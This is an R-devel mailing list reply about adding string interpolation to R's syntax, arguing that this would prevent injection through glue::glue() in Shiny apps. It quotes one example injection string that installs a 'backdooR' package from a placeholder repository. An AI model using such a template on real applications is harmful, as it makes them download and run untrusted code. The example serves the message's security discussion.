В Mon, 15 Dec 2025 10:25:02 -0800
Henrik Bengtsson <[email protected]> пишет:
> In order to safely introduce string interpolation, I think the best
> would be to introduce a standard syntax that would allow for static
> code inspection, e.g. g"hello ${nane}". That would make it possible to
> validate the string interpolation during parsing, or immediately
> after, but before evaluation.
Making this a feature of syntax, not just the runtime, has another
important property of preventing injection vulnerabilities.
If, say, a Shiny application gives user input to glue::glue(), then
game over: the user can just ask it to format a string containing
'{install.packages("backdooR", repos="https://example.invalid";)}'. With
string interpolation as part of syntax for strings, this will only
happen with trusted source code, as few applications will deliberately
call eval(parse(...)) on untrusted user input.
(In theory, 'glue' could substitute() the argument to make sure it's a
sting constant, but the way it currently works is definitely more
convenient.)
--
Best regards,
Ivan
______________________________________________
[email protected] mailing list
https://stat.ethz.ch/mailman/listinfo/r-devel
